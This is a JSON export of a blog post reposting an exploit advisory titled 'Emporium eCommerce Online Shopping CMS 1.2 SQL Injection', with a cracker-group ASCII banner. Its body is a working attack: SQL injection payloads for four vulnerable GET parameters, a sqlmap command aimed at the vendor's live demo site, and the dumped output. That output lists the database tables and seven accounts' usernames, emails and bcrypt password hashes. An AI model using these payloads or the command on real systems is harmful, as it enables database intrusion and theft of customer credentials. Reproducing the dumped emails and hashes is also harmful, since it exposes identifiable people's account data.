{"id":28311,"date":"2022-07-24T10:18:35","date_gmt":"2022-07-24T06:18:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167770\/emporiumecommcms12-sql.txt"},"modified":"2022-07-24T13:59:31","modified_gmt":"2022-07-24T09:29:31","slug":"emporium-ecommerce-online-shopping-cms-1-2-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/emporium-ecommerce-online-shopping-cms-1-2-sql-injection\/","title":{"rendered":"Emporium eCommerce Online Shopping CMS 1.2 SQL Injection"},"content":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u2502\u2502 C r a C k E r \u250c\u2518
\n\u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

\u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 [ Exploits ] \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: Author : CraCkEr \u2502 \u2502 :
\n\u2502 Website : mybizcms.com \u2502 \u2502 \u2502
\n\u2502 Vendor : mybizcms \u2502 \u2502 \u2502
\n\u2502 Software : Emporium eCommerce – \u2502 \u2502 \u2502
\n\u2502 Online Shopping CMS v 1.2 \u2502 \u2502 Emporium eCommerce \u2502
\n\u2502 Vuln Type: Remote SQL Injection \u2502 \u2502 \u2502
\n\u2502 Method : GET \u2502 \u2502 is a complete online \u2502
\n\u2502 Critical : High [\u2591\u2591\u2592\u2592\u2593\u2593\u2588\u2588] \u2502 \u2502 shopping platform for all your needs \u2502
\n\u2502 Impact : Database Access \u2502 \u2502 \u2502
\n\u2502 \u2502 \u2502 \u2502
\n\u2502 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502
\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: :
\n\u2502 Release Notes: \u2502
\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502
\n\u2502 Typically used for remotely exploitable vulnerabilities that can lead to \u2502
\n\u2502 system compromise. \u2502
\n\u2502 \u2502
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

Greets:
\nPhr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
\nloool, DevS, Dark-Gost
\nCryptoJob (Twitter) twitter.com\/CryptozJob
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

There’s 4 parameters Vulnerable to SQL Injection in \/categories\/other-categories?<\/p>\n

GET parameter ‘min_price’ is vulnerable<\/p>\n


\nParameter: min_price (GET)
\nType: error-based
\nTitle: MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)
\nPayload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 time-based blind – Parameter replace (substraction)
\nPayload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
\n—<\/p>\n

GET parameter ‘percentage’ is vulnerable.<\/p>\n


\nParameter: percentage (GET)
\nType: boolean-based blind
\nTitle: MySQL boolean-based blind – Parameter replace (MAKE_SET)
\nPayload: percentage=MAKE_SET(4728=4728,5649)<\/p>\n

Type: error-based
\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
\nPayload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
\n—<\/p>\n

GET parameter ‘review_ratings’ is vulnerable<\/p>\n


\nParameter: review_ratings (GET)
\nType: error-based
\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
\nPayload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
\n—<\/p>\n

GET parameter ‘brand[]’ is vulnerable<\/p>\n


\nParameter: brand[] (GET)
\nType: boolean-based blind
\nTitle: AND boolean-based blind – WHERE or HAVING clause
\nPayload: brand[]=15′) AND 3512=3512 AND (‘Othl’=’Othl<\/p>\n

Type: stacked queries
\nTitle: MySQL >= 5.0.12 stacked queries (comment)
\nPayload: brand[]=15′);SELECT SLEEP(5)#<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: brand[]=15′) AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND (‘KJgc’=’KJgc
\n—<\/p>\n

Live Demo Site:<\/p>\n

https:\/\/mybizcms.com\/demos\/multivendor\/<\/p>\n

[+] Starting the Attack<\/p>\n

sqlmap.py -u “https:\/\/mybizcms.com\/demos\/multivendor\/categories\/other-categories?brand%5B%5D=15” –current-db –batch –random-agent<\/p>\n

[INFO] the back-end DBMS is MySQL
\nweb application technology: Apache, PHP 7.3.33, PHP
\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)
\n[INFO] fetching current database
\ncurrent database: ‘mybizcms_multivendor’<\/p>\n

fetching tables for database: ‘mybizcms_multivendor’
\n[101 tables]\n

+————————–+
\n| returns |
\n| ad_placements |
\n| addresses |
\n| ads |
\n| attribute_items |
\n| attributes |
\n| authorize_net_settings |
\n| brands |
\n| categories |
\n| collections |
\n| company |
\n| counties |
\n| countries |
\n| credit_card_types |
\n| cronjobs |
\n| customers |
\n| deliveries |
\n| delivery_items |
\n| delivery_options |
\n| delivery_status |
\n| discounts |
\n| email_templates |
\n| facebook_settings |
\n| faqs |
\n| flash_sale_items |
\n| flash_sales |
\n| flutterwave_settings |
\n| github_settings |
\n| google_settings |
\n| item_status |
\n| labels |
\n| linkedin_settings |
\n| logs |
\n| media |
\n| mpesa_settings |
\n| newsletters |
\n| notifications |
\n| options |
\n| order_details |
\n| order_items |
\n| order_status |
\n| orders |
\n| pages |
\n| payment_options |
\n| payment_status |
\n| payments |
\n| payout_modes |
\n| payout_status |
\n| payouts |
\n| paypal_pro_settings |
\n| paypal_standard_settings |
\n| paytm_settings |
\n| payu_money_settings |
\n| permissions |
\n| pesapal_settings |
\n| pickup_stations |
\n| post_categories |
\n| post_comments |
\n| posts |
\n| product_attributes |
\n| product_images |
\n| product_reviews |
\n| product_stock |
\n| product_types |
\n| product_variants |
\n| product_wholesales |
\n| products |
\n| quicks |
\n| return_reasons |
\n| return_status |
\n| rewards |
\n| role_sub_permissions |
\n| roles |
\n| saved_items |
\n| sessions |
\n| shipping_fees |
\n| shipping_regions |
\n| shipping_weights |
\n| shops |
\n| sliders |
\n| stripe_settings |
\n| sub_permissions |
\n| subscribers |
\n| supported_currencies |
\n| tags |
\n| taxes |
\n| temp_data |
\n| ticket_priority |
\n| ticket_replies |
\n| ticket_status |
\n| tickets |
\n| timezones |
\n| twitter_settings |
\n| twocheckout_settings |
\n| user_status |
\n| user_sub_permissions |
\n| users |
\n| variant_choices |
\n| variant_options |
\n| wallets |
\n| weights |
\n+————————–+<\/p>\n

fetching columns for table ‘users’ in database ‘mybizcms_multivendor’<\/p>\n

Table: users
\n[34 columns]\n

+————————+————–+
\n| Column | Type |
\n+————————+————–+
\n| calling_code | varchar(11) |
\n| city | varchar(100) |
\n| company | varchar(100) |
\n| country_id | int(11) |
\n| date_added | datetime |
\n| default_billing | int(11) |
\n| default_currency | int(11) |
\n| default_language | varchar(40) |
\n| default_shipping | int(11) |
\n| department_id | int(11) |
\n| email | varchar(100) |
\n| firstname | varchar(50) |
\n| last_ip | varchar(40) |
\n| last_login | datetime |
\n| last_password_change | datetime |
\n| lastname | varchar(50) |
\n| latitude | varchar(300) |
\n| longitude | varchar(300) |
\n| new_pass_key_requested | datetime |
\n| passkey | varchar(32) |
\n| password | varchar(256) |
\n| payout_address | longtext |
\n| payout_mode_id | int(11) |
\n| phone | varchar(30) |
\n| postal_code | varchar(100) |
\n| profile_image | varchar(150) |
\n| role_id | int(11) |
\n| state | varchar(50) |
\n| street | varchar(100) |
\n| user_id | int(11) |
\n| user_status_id | int(11) |
\n| user_uid | varchar(50) |
\n| username | varchar(100) |
\n| zip_code | varchar(15) |
\n+————————+————–+<\/p>\n

fetching entries of column(s) ’email,password,username’ for table ‘users’ in database ‘mybizcms_multivendor’<\/p>\n

Database: mybizcms_multivendor
\nTable: users
\n[7 entries]\n

+———-+————————————————————–+————————+
\n| username | password | email |
\n+———-+————————————————————–+————————+
\n| admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com |
\n| one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com |
\n| two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI\/oeC | jdoe@gmail.con |
\n| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com |
\n| three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ\/bLD6FcmvCowStICaaw. | tew@gmail.com |
\n| user | $2y$10$eZ0\/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com |
\n| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com |
\n+———-+————————————————————–+————————+<\/p>\n

[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u2502 C r a C k E r \u250c\u2518 \u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 \u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510 \u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2518 [ Exploits ] \u250c\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 : Author …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28311","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28311"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28311\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}